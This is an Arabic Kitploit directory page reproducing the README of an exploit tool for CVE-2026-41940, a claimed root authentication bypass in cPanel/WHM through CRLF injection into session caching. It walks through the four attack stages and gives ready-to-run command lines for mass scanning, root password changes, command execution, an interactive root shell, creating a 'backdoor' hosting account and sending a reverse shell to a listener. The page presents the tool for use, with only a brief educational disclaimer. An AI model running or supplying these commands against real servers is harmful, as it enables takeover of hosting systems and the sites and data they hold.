Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940 — تجاوز المصادقة في cPanel/WHM (ثغرة يوم صفر) | Kitploit
أدوات/GitHubGitHub/christian93111/cve-2026-41940
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالمصادقةالتعلم والتعليمالفريق الأحمرتطوير الحمولات
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

تجاوز المصادقة في cPanel/WHM (ثغرة يوم صفر)

1024منذ 3 أشهرلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41940: تجاوز المصادقة في cPanel/WHM (هدف واحد أو متعدد)

إخلاء مسؤولية: هذه الوثيقة والنص البرمجي المرتبط بها (exploit.py) مقدمان لأغراض تعليمية فقط، وللبحث الأمني، واختبار الاختراق المصرح به. لا تستخدم هذا البرنامج ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها.

نظرة عامة

exploit.py هو نص برمجي يوضح ثغرة تجاوز المصادقة (CVE-2026-41940) في cPanel و WHM. تسمح الثغرة لمهاجم غير موثوق بحقن جلسة صلاحية الجذر (root) في ذاكرة التخزين المؤقت للخدمة عبر ثغرة حقن CRLF، مما يمنح في النهاية وصولاً على مستوى صلاحية الجذر إلى WHM دون الحاجة إلى بيانات اعتماد صالحة.

تحليل الثغرة وسير الاستغلال

يعمل الاستغلال عن طريق استغلال ثغرة حقن CRLF (إرجاع العربة وتغذية السطر) في آلية التعامل مع المصادقة الأساسية (Basic Authentication)، بالإضافة إلى خلل في انتشار الجلسة. يقوم النص البرمجي بأتمتة الهجوم في أربع مراحل:

  1. صك جلسة ما قبل المصادقة: الاتصال بنقاط نهاية تسجيل الدخول العامة (مثل /login/ أو /cgi/login.cgi) للحصول على ملف تعريف ارتباط جلسة أساسي غير موثوق ().
whostmgrsession
  • حقن CRLF: إرسال رأس مصادقة أساسية (Basic Authentication) مصنوع يحتوي على حمولة مشفرة بـ Base64 تقوم بحقن حقول جلسة الجذر مباشرة في ذاكرة التخزين المؤقت للجلسات لـ cpsrvd. يؤدي رد الخادم بإعادة التوجيه إلى تسريب رمز الأمان المولد (cpsess).
  • انتشار الجلسة: يتم إرسال ملف تعريف ارتباط الجلسة الخام إلى نقطة نهاية موثوقة في WHM، مما يؤدي إلى تشغيل do_token_denied لنشر الجلسة المزورة في ذاكرة التخزين المؤقت للخدمة — مما يجعلها جلسة موثوقة صالحة.
  • التحقق: الوصول إلى نقاط نهاية واجهة برمجة تطبيقات WHM المقيدة (مثل /json-api/version) باستخدام الجلسة المزورة لتأكيد الوصول على مستوى الجذر.

  • المتطلبات الأساسية

    • Python 3.x
    • مكتبة requests
    root@kitploit:~
    pip install requests
    

    الاستخدام

    root@kitploit:~
    python exploit.py --target <URL> [options]
    python exploit.py --target-file <FILE> [options]
    

    الوسائط

    اختيار الهدف

    الوسيطالوصف
    --target URLعنوان URL واحد لـ WHM (مثل https://target:2087)
    --target-file FILEملف يحتوي على أهداف (كل سطر ip:port) — يقوم تلقائياً بتمكين وضع الفحص

    خيارات الشبكة والأساسية

    الوسيطالوصف
    --threads Nعدد الخيوط المتزامنة لوضع الأهداف المتعددة (الافتراضي: 10)
    --hostname HOSTتجاوز عنوان Host — استخدمه عندما يفشل الاكتشاف التلقائي أو يعطي اسم مضيف خاطئ
    --timeout Nمهلة كل طلب بالثواني (الافتراضي: 15)
    --retries Nعدد مرات إعادة المحاولة عند أخطاء الشبكة (الافتراضي: 3)
    --cookie-name NAMEفرض اسم معين لملف تعريف ارتباط الجلسة (يُكتشف تلقائياً إذا تم حذفه)
    --no-verifyتخطي مرحلة التحقق 4 والمتابعة على أي حال

    خيارات الاستغلال (ما بعد التجاوز)

    الوسيطالوصف
    --checkوضع الفحص فقط — التحقق من وجود الثغرة دون استغلال (يتم تعيينه تلقائياً مع --target-file)
    --password PASSتغيير كلمة مرور الجذر إلى PASS
    --api FUNCاستدعاء دالة معينة من واجهة برمجة تطبيقات WHM بصيغة JSON
    --api-params K=V,...معاملات مفصولة بفواصل لـ --api
    --exec CMDتنفيذ أمر نظام تشغيل عبر WHM scripts/run_script (البديل: rawexec)
    --sessionإنشاء رابط تسجيل دخول بنقرة واحدة بصلاحية الجذر — افتحه فوراً، الرمز ينتهي بسرعة
    --shellالدخول في شيل WHM تفاعلي (لأهداف مفردة فقط)
    --dumpتفريغ معلومات الخادم: الإصدار، الحسابات، مناطق DNS، الصلاحيات
    --add-user USER PASS DOMAINإنشاء حساب استضافة cPanel جديد
    --revshell LHOST LPORTإرسال شيل عكسي باش (bash) إلى المستمع الخاص بك

    خيارات الإخراج

    الوسيطالوصف
    --output FILEحفظ رمز الجلسة والتفاصيل في ملف JSON

    أمثلة

    root@kitploit:~
    # Check if target is vulnerable
    python exploit.py --target https://target:2087 --check
    
    # Dump server info (version, accounts, privileges)
    python exploit.py --target https://target:2087 --dump
    
    # Generate a one-click root login URL (paste in browser immediately)
    python exploit.py --target https://target:2087 --session
    
    # Execute a command
    python exploit.py --target https://target:2087 --exec "id"
    
    # Drop into an interactive WHM shell
    python exploit.py --target https://target:2087 --shell
    
    # Change root password
    python exploit.py --target https://target:2087 --password 'NewP@ss!'
    
    # Call WHM API directly
    python exploit.py --target https://target:2087 --api version
    python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1
    
    # Create a backdoor cPanel account
    python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com
    
    # Send reverse shell
    python exploit.py --target https://target:2087 --revshell YOUR_IP 4444
    
    # Override hostname (use when auto-discovery fails)
    python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check
    
    # Scan multiple targets (check-only mode)
    python exploit.py --target-file ips.txt
    python exploit.py --target-file ips.txt --threads 20
    
    # Save session to file
    python exploit.py --target https://target:2087 --dump --output results.json
    

    أوامر الشيل التفاعلي

    عند استخدام --shell، الأوامر التالية متاحة:

    الأمرالوصف
    api <function> [k=v ...]استدعاء دالة من واجهة برمجة تطبيقات WHM بصيغة JSON (مثل api version)
    exec <command>تشغيل أمر نظام تشغيل عبر WHM (مثل exec id)
    passwd <newpass>تغيير كلمة مرور الجذر
    dumpتفريغ معلومات الخادم
    revshell <lhost> <lport>إرسال شيل عكسي
    add <user> <pass> <domain>إنشاء حساب cPanel
    save <path>حفظ الجلسة الحالية في ملف
    exit / quitالخروج من الشيل

    تذكير

    قم بتحديث تصحيحات الأمان الخاصة بـ cPanel/WHM إلى أحدث إصدار فوراً.

    تنزيل الأداة